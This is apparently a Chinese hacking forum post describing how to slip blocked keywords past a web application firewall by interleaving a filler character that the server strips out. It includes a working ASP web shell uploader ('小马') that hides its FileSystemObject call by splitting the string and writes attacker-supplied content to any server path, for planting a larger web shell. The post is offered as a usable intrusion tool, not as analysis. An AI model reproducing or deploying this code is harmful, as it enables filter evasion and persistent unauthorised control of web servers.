我們提交select會被攔截(如無特別指出,都為post),但是我們提交 s魚e魚l魚e魚c魚t 那就不會被攔截了
也就是我們在提交時,將文本內(nèi)容進(jìn)行加密,提交到服務(wù)器后,在進(jìn)行重新解密,這樣就能繞過一流攔截系統(tǒng)了
一下是一個自己測試用的小馬
這個小馬的缺點:由于加密時是把整個文本進(jìn)行加密的,所以上傳的文本大小為原來的3倍,本地測試時傳大馬,卡半天
不過這個可以增加關(guān)鍵字來解決,處理文本時把select等關(guān)鍵字進(jìn)行加密就行了
一點小思路,拋磚引玉 by 3x
<%
on error resume next
if request("path")<>"" then
temp="scrip"&"ting.f"&"ilesyst"&"emobject"
set fso=server.createobject(temp)
response.write request.Form&""
path=request("path")
dama=replace(request("content"),"魚","")
dama=replace(dama,"’","'")
dama=replace(dama,"‘","'")
set f=fso.createtextfile(path,true)
f.write dama
if err=0 then
response.write "成功"
else
response.write "失敗"
err.clear
end if
set f=nothing
set fso=nothing
end if
%>
當(dāng)前路徑 <%=server.mappath(request.servervariables("script_name"))%>
保存路徑